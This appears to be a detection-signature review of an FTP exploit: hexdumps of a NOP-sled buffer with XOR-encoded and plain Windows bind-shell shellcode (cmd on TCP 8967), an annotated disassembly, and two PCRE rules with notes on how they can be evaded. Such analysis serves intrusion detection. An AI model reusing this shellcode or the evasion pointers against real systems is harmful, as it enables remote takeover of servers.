hexdump — exploit buffer, XOR-encoded variant (FTP `PASS x` / `PORT` prefix, NOP sled, decoder stub at 0x133, encoded shellcode body 0x149–0x225)
00000000 50 41 53 53 20 78 0a 50 4f 52 54 20 90 90 90 90 |PASS x.PORT ....| 00000010 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................| * 00000110 90 90 90 90 90 90 90 eb 06 90 90 21 bf c0 77 e9 |...........!..w.| 00000120 13 fc ff ff 90 90 90 90 90 90 90 90 90 90 90 90 |................| 00000130 90 90 90 eb 0f 8b 34 24 33 c9 80 c1 dd 80 36 de |......4$3.....6.| 00000140 46 e2 fa c3 e8 ec ff ff ff ba b9 51 d8 de de 60 |F..........Q...`| 00000150 12 ce 60 a9 b6 ed ec de de b6 a9 ad ec 81 8a 21 |..`............!| 00000160 cb 0e ce 60 a9 49 47 8c 8c 8c 8c 9c 8c 9c 8c 36 |...`.IG........6| 00000170 d5 de de de 89 8d 9f 8d b1 bd b5 bb aa 9f de 89 |................| 00000180 21 c8 21 0e 4d b4 de b6 dc de fd d9 55 1a b4 ce |!.!.M.......U...| 00000190 8e 8d 36 db de de de bc b7 b0 ba de 89 21 c8 21 |..6..........!.!| 000001a0 0e b4 df 8d 36 d9 de de de b2 b7 ad aa bb b0 de |....6...........| 000001b0 89 21 c8 21 0e b4 de 8a 8d 36 d9 de de de bf bd |.!.!.....6......| 000001c0 bd bb ae aa de 89 21 c8 21 0e 55 06 ed 1e b4 ce |......!.!.U.....| 000001d0 87 55 22 89 dd 27 89 2d 75 55 e2 fa 8e 8e 8e b4 |.U"..'.-uU......| 000001e0 df 8e 8e 36 da de de de bd b3 ba de 8e 36 d1 de |...6.........6..| 000001f0 de de 9d ac bb bf aa bb 8e ac b1 bd bb ad ad 9f |................| 00000200 de 18 d9 9a 19 99 f2 df df de de 5d 19 e6 4d 75 |...........]..Mu| 00000210 75 75 ba b9 7f ee de 55 9e d2 55 9e c2 55 de 21 |uu.....U..U..U.!| 00000220 ae d6 21 c8 21 0e eb 90 90 90 90 90 90 90 90 90 |..!.!...........| 00000230 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................| * 000007d0 90 90 90 90 90 90 90 0a |........| 000007d8
hexdump — same exploit buffer, unencoded variant (decoder region 0x133–0x148 is left as NOPs; plain bind-shell body starts at 0x149)
00000000 50 41 53 53 20 78 0a 50 4f 52 54 20 90 90 90 90 |PASS x.PORT ....| 00000010 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................| * 00000110 90 90 90 90 90 90 90 eb 06 90 90 21 bf c0 77 e9 |.......ë...!¿Àwé| 00000120 13 fc ff ff 90 90 90 90 90 90 90 90 90 90 90 90 |.üÿÿ............| 00000130 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................| 00000140 90 90 90 90 90 90 90 90 90 64 67 8f 06 00 00 be |.........dg....Ÿ| 00000150 cc 10 be 77 68 33 32 00 00 68 77 73 32 5f 54 ff |Ì.Ÿwh32..hws2_Tÿ| 00000160 15 d0 10 be 77 97 99 52 52 52 52 42 52 42 52 e8 |.Ð.Ÿw..RRRRBRBRè| 00000170 0b 00 00 00 57 53 41 53 6f 63 6b 65 74 41 00 57 |....WSASocketA.W| 00000180 ff 16 ff d0 93 6a 00 68 02 00 23 07 8b c4 6a 10 |ÿ.ÿÐ.j.h..#..Äj.| 00000190 50 53 e8 05 00 00 00 62 69 6e 64 00 57 ff 16 ff |PSè....bind.Wÿ.ÿ| 000001a0 d0 6a 01 53 e8 07 00 00 00 6c 69 73 74 65 6e 00 |Ðj.Sè....listen.| 000001b0 57 ff 16 ff d0 6a 00 54 53 e8 07 00 00 00 61 63 |Wÿ.ÿÐj.TSè....ac| 000001c0 63 65 70 74 00 57 ff 16 ff d0 8b d8 33 c0 6a 10 |cept.Wÿ.ÿÐ.Ø3Àj.| 000001d0 59 8b fc 57 03 f9 57 f3 ab 8b 3c 24 50 50 50 6a |Y.üW.ùWó«.<$PPPj| 000001e0 01 50 50 e8 04 00 00 00 63 6d 64 00 50 e8 0f 00 |.PPè....cmd.Pè..| 000001f0 00 00 43 72 65 61 74 65 50 72 6f 63 65 73 73 41 |..CreateProcessA| 00000200 00 c6 07 44 c7 47 2c 01 01 00 00 83 c7 38 93 ab |.Æ.DÇG,.....Ç8.«| 00000210 ab ab 64 67 a1 30 00 8b 40 0c 8b 40 1c 8b 00 ff |««dg¡0..@..@...ÿ| 00000220 70 08 ff 16 ff d0 eb 90 90 90 90 90 90 90 90 90 |p.ÿ.ÿÐë.........| 00000230 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................| * 000007d0 90 90 90 90 90 90 90 0a |........| 000007d8
; ---------------------------------------------------------------------------
; XOR decoder stub (encoded variant). The jmp/call pair puts 0x149 -- the first
; byte of the encoded body -- on the stack as a "return address", which the
; loop reads with mov esi,[esp] (a GetPC trick without a pop). The loop then
; XORs 0xDD bytes (0x149..0x225) in place with key 0xDE and retn falls straight
; into the decoded body. Both the count and the key are single-byte immediates,
; which is why the detection pattern for this stub wildcards exactly those two
; bytes. Because code is patched in place and then executed, the buffer must
; be both writable and executable.
; Clobbers: esi, ecx, flags. esp is unchanged on exit (retn consumes the
; return address pushed by the call at 0x144).
; ---------------------------------------------------------------------------
00000133 jmp short loc_144               ; skip over the loop; it is entered via the call below
00000135 ; ---------------------------------------------------------------------------
00000135
00000135 loc_135:
00000135 mov esi, [esp]                  ; esi = return address pushed by call at 0x144 = 0x149 (start of encoded body)
00000138 xor ecx, ecx
0000013A add cl, 0DDh                    ; ecx = 0xDD = 221 bytes to decode (0x149..0x225)
0000013D
0000013D loc_13D:
0000013D xor byte ptr [esi], 0DEh        ; decode one byte in place with key 0xDE
00000140 inc esi
00000141 loop loc_13D                    ; --ecx; repeat while ecx != 0
00000143 retn                            ; return address is still 0x149 -> continues in the now-decoded body
00000144 ; ---------------------------------------------------------------------------
00000144
00000144 loc_144:
00000144 call loc_135                    ; pushes 0x149 and enters the loop
; ---------------------------------------------------------------------------
; Bind-shell body (executed at 0x149 after decoding, or directly in the plain
; variant). Sequence: LoadLibraryA("ws2_32"), WSASocketA, bind (TCP 0x2307 =
; 8967 on INADDR_ANY), listen, accept, then CreateProcessA("cmd") with
; stdin/stdout/stderr redirected to the accepted socket and a hidden window.
; Each API name string is placed right after a `call`, so the call's return
; address is the string's address and doubles as the lpProcName argument.
; Register roles: esi = import slot holding GetProcAddress (every lookup is
; `call dword ptr [esi]`), edi = ws2_32 module handle until 0x1D1, ebx =
; listening socket, later the accepted socket.
; Notes for the reviewer: there is no WSAStartup call (presumably the target
; process has Winsock initialised already); the absolute addresses 0x77BE10CC
; and 0x77BE10D0 tie this payload to one specific DLL build/base, which is also
; why the detection pattern for the plain variant embeds those bytes.
; ---------------------------------------------------------------------------
00000149 pop dword ptr fs:0              ; fs:[0] (SEH chain head) = [esp]; the value depends on how control arrived -- looks like it restores/replaces the exception record the overflow clobbered (TODO confirm against the crash context)
0000014F mov esi, 77BE10CCh ; GetProcAddress -- hard-coded import slot; only valid for the module build/base it was taken from
00000154 push '23'                       ; bytes 68 33 32 00 00 -> "32\0\0"
00000159 push '_2sw'                     ; bytes 68 77 73 32 5F -> "ws2_"; the stack now holds "ws2_32\0"
0000015E push esp                        ; lpLibFileName = "ws2_32"
0000015F call dword ptr ds:77BE10D0h ; LoadLibraryA -- via hard-coded import slot
00000165 xchg eax, edi                   ; edi = HMODULE of ws2_32
00000166 cdq                             ; edx = 0, but only because cdq sign-extends eax: relies on the module base being < 0x80000000
00000167 push edx                        ; dwFlags = 0
00000168 push edx                        ; g = 0
00000169 push edx                        ; lpProtocolInfo = NULL
0000016A push edx                        ; protocol = 0
0000016B inc edx
0000016C push edx                        ; type = 1 (SOCK_STREAM)
0000016D inc edx
0000016E push edx                        ; af = 2 (AF_INET)
0000016F call loc_17F                    ; pushes &"WSASocketA" (lpProcName) and skips the string
0000016F ; ---------------------------------------------------------------------------
00000174 aWsasocketa db 'WSASocketA',0
0000017F ; ---------------------------------------------------------------------------
0000017F
0000017F loc_17F:
0000017F push edi                        ; hModule = ws2_32
00000180 call dword ptr [esi] ; GetProcAddress WSASocketA
00000182 call eax                        ; WSASocketA(AF_INET, SOCK_STREAM, 0, NULL, 0, 0)
00000184 xchg eax, ebx                   ; ebx = listening socket
00000185 push 0                          ; sin_addr = 0.0.0.0 (INADDR_ANY)
00000187 push 7230002h ; port & type    -- bytes 02 00 23 07: sin_family = AF_INET, sin_port = 0x2307 in network order = TCP 8967
0000018C mov eax, esp                    ; eax = &sockaddr_in; sin_zero is whatever already sat on the stack (only 8 bytes were pushed)
0000018E push 10h                        ; namelen = 16 = sizeof(sockaddr_in)
00000190 push eax                        ; name
00000191 push ebx                        ; s
00000192 call loc_19C                    ; pushes &"bind"
00000192 ; ---------------------------------------------------------------------------
00000197 aBind db 'bind',0
0000019C ; ---------------------------------------------------------------------------
0000019C
0000019C loc_19C:
0000019C push edi
0000019D call dword ptr [esi] ; GetProcAddress bind
0000019F call eax                        ; bind(s, &sockaddr_in, 16); return value is not checked
000001A1 push 1                          ; backlog = 1
000001A3 push ebx                        ; s
000001A4 call loc_1B0                    ; pushes &"listen"
000001A4 ; ---------------------------------------------------------------------------
000001A9 aListen db 'listen',0
000001B0 ; ---------------------------------------------------------------------------
000001B0
000001B0 loc_1B0:
000001B0 push edi
000001B1 call dword ptr [esi] ; GetProcAddress listen
000001B3 call eax                        ; listen(s, 1)
000001B5 push 0                          ; addrlen = NULL
000001B7 push esp                        ; addr -> the 0 just pushed; the peer address is effectively not retrieved
000001B8 push ebx                        ; s
000001B9 call loc_1C5                    ; pushes &"accept"
000001B9 ; ---------------------------------------------------------------------------
000001BE aAccept db 'accept',0
000001C5 ; ---------------------------------------------------------------------------
000001C5
000001C5 loc_1C5:
000001C5 push edi
000001C6 call dword ptr [esi] ; GetProcAddress accept
000001C8 call eax                        ; accept(s, ...) -- blocks until a client connects
000001CA mov ebx, eax                    ; ebx = accepted (client) socket
000001CC xor eax, eax                    ; eax = 0, reused below for every NULL/0 argument
000001CE push 10h
000001D0 pop ecx                         ; ecx = 16 (dword count for rep stosd)
000001D1 mov edi, esp                    ; let E = esp here
000001D3 push edi                        ; lpProcessInformation = E (16 bytes at E..E+0x10, output only, left uninitialised)
000001D4 add edi, ecx                    ; edi = E+0x10
000001D6 push edi                        ; lpStartupInfo = E+0x10 (0x44 bytes)
000001D7 rep stosd                       ; zero the first 64 bytes of STARTUPINFO; hStdError at +0x40 is written by the third stosd below
000001D9 mov edi, [esp]                  ; edi = lpStartupInfo
000001DC push eax                        ; lpCurrentDirectory = NULL
000001DD push eax                        ; lpEnvironment = NULL
000001DE push eax                        ; dwCreationFlags = 0
000001DF push 1                          ; bInheritHandles = TRUE, so the socket handles reach the child
000001E1 push eax                        ; lpThreadAttributes = NULL
000001E2 push eax                        ; lpProcessAttributes = NULL
000001E3 call loc_1EC                    ; pushes &"cmd" = lpCommandLine
000001E3 ; ---------------------------------------------------------------------------
000001E8 aCmd db 'cmd',0
000001EC ; ---------------------------------------------------------------------------
000001EC
000001EC loc_1EC:
000001EC push eax                        ; lpApplicationName = NULL
000001ED call loc_201                    ; pushes &"CreateProcessA" (lpProcName for the lookup at 0x222)
000001ED ; ---------------------------------------------------------------------------
000001F2 aCreateprocessa db 'CreateProcessA',0
00000201 ; ---------------------------------------------------------------------------
00000201
00000201 loc_201:
00000201 mov byte ptr [edi], 44h         ; STARTUPINFO.cb = 0x44 = sizeof(STARTUPINFOA)
00000204 mov dword ptr [edi+2Ch], 101h   ; dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; wShowWindow (+0x30) was zeroed above = SW_HIDE
0000020B add edi, 38h                    ; edi = &hStdInput
0000020E xchg eax, ebx                   ; eax = client socket (ebx becomes 0)
0000020F stosd                           ; hStdInput  = socket
00000210 stosd                           ; hStdOutput = socket
00000211 stosd                           ; hStdError  = socket
00000212 mov eax, fs:30h                 ; PEB (standard PEB/LDR layout assumed for the next three loads)
00000217 mov eax, [eax+0Ch]              ; PEB->Ldr
0000021A mov eax, [eax+1Ch]              ; Ldr->InInitializationOrderModuleList.Flink (1st entry)
0000021D mov eax, [eax]                  ; 2nd entry
0000021F push dword ptr [eax+8]          ; its DllBase as hModule -- which DLL is 2nd depends on the OS version (kernel32 on the 2000/XP-era layout this presumably targets); CreateProcessA must be exported by it
00000222 call dword ptr [esi] ; GetProcAddress CreateProcessA
00000224 call eax                        ; CreateProcessA(NULL, "cmd", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)
/*
 * Signature for the XOR decoder stub of the encoded variant (the bytes at
 * 0x133..0x148):  jmp short +0F / mov esi,[esp] / xor ecx,ecx / add cl,<count> /
 * xor byte [esi],<key> / inc esi / loop / retn / call -14h.
 * The two (.) groups wildcard the byte count and the XOR key, so the stub is
 * matched for any key and length; the outer (.*) groups only capture the
 * prefix and suffix of the buffer.
 *
 * NOTE(review): in PCRE '.' does not match 0x0A unless the pattern is compiled
 * with the DOTALL ('s') option. With default options a count or key byte of
 * 0x0A, or a 0x0A anywhere in the trailing (.*) before '$', makes the rule
 * miss. The compile options are not visible in this excerpt -- confirm them at
 * the pcre_compile() call, or use "(?s)" / "[\s\S]" in place of '.'. The stub
 * is matched byte-for-byte, so any re-encoding that changes the register or
 * loop shape evades it. The declaration continues past this excerpt (trailing
 * comma).
 */
char *pcre = "(.*)(\\xEB\\x0F\\x8B\\x34\\x24\\x33\\xC9\\x80\\xC1(.)\\x80\\x36(.)\\x46\\xE2\\xFA\\xC3\\xE8\\xEC\\xFF\\xFF\\xFF)(.*)$",
/*
 * Signature for the unencoded bind-shell body (the bytes from 0x14F in the
 * plain variant): LoadLibraryA("ws2_32"), WSASocketA, bind, listen, accept,
 * then CreateProcessA("cmd") with the accepted socket as stdin/stdout/stderr.
 * The (..) group wildcards the two sin_port bytes of `push 07230002h`
 * (68 02 00 pp pp), so any listening port is matched.
 *
 * NOTE(review): the hard-coded import slots \xCC\x10\xBE\x77 (GetProcAddress)
 * and \xD0\x10\xBE\x77 (LoadLibraryA) are part of the pattern, so it only
 * fires on shellcode built for that exact module base; a port to another
 * OS/DLL build changes those bytes and evades the rule. As with any PCRE using
 * '.', a port byte of 0x0A is missed unless DOTALL is set -- check the compile
 * options. Consider anchoring on the API-string/call structure rather than the
 * absolute addresses if broader coverage is wanted.
 */
char *pcre = "\\xBE\\xCC\\x10\\xBE\\x77\\x68\\x33\\x32\\x00\\x00\\x68\\x77\\x73\\x32\\x5F\\x54" "\\xFF\\x15\\xD0\\x10\\xBE\\x77\\x97\\x99\\x52\\x52\\x52\\x52\\x42\\x52\\x42\\x52" "\\xE8\\x0B\\x00\\x00\\x00\\x57\\x53\\x41\\x53\\x6F\\x63\\x6B\\x65\\x74\\x41\\x00" "\\x57\\xFF\\x16\\xFF\\xD0\\x93\\x6A\\x00\\x68\\x02\\x00(..)\\x8B\\xC4" "\\x6A\\x10\\x50\\x53\\xE8\\x05\\x00\\x00\\x00\\x62\\x69\\x6E\\x64\\x00\\x57\\xFF" "\\x16\\xFF\\xD0\\x6A\\x01\\x53\\xE8\\x07\\x00\\x00\\x00\\x6C\\x69\\x73\\x74\\x65" "\\x6E\\x00\\x57\\xFF\\x16\\xFF\\xD0\\x6A\\x00\\x54\\x53\\xE8\\x07\\x00\\x00\\x00" "\\x61\\x63\\x63\\x65\\x70\\x74\\x00\\x57\\xFF\\x16\\xFF\\xD0\\x8B\\xD8\\x33\\xC0" "\\x6A\\x10\\x59\\x8B\\xFC\\x57\\x03\\xF9\\x57\\xF3\\xAB\\x8B\\x3C\\x24\\x50\\x50" "\\x50\\x6A\\x01\\x50\\x50\\xE8\\x04\\x00\\x00\\x00\\x63\\x6D\\x64\\x00\\x50\\xE8" "\\x0F\\x00\\x00\\x00\\x43\\x72\\x65\\x61\\x74\\x65\\x50\\x72\\x6F\\x63\\x65\\x73" "\\x73\\x41\\x00\\xC6\\x07\\x44\\xC7\\x47\\x2C\\x01\\x01\\x00\\x00\\x83\\xC7\\x38" "\\x93\\xAB\\xAB\\xAB\\x64\\x67\\xA1\\x30\\x00\\x8B\\x40\\x0C\\x8B\\x40\\x1C\\x8B" "\\x00\\xFF\\x70\\x08\\xFF\\x16\\xFF\\xD0\\xEB";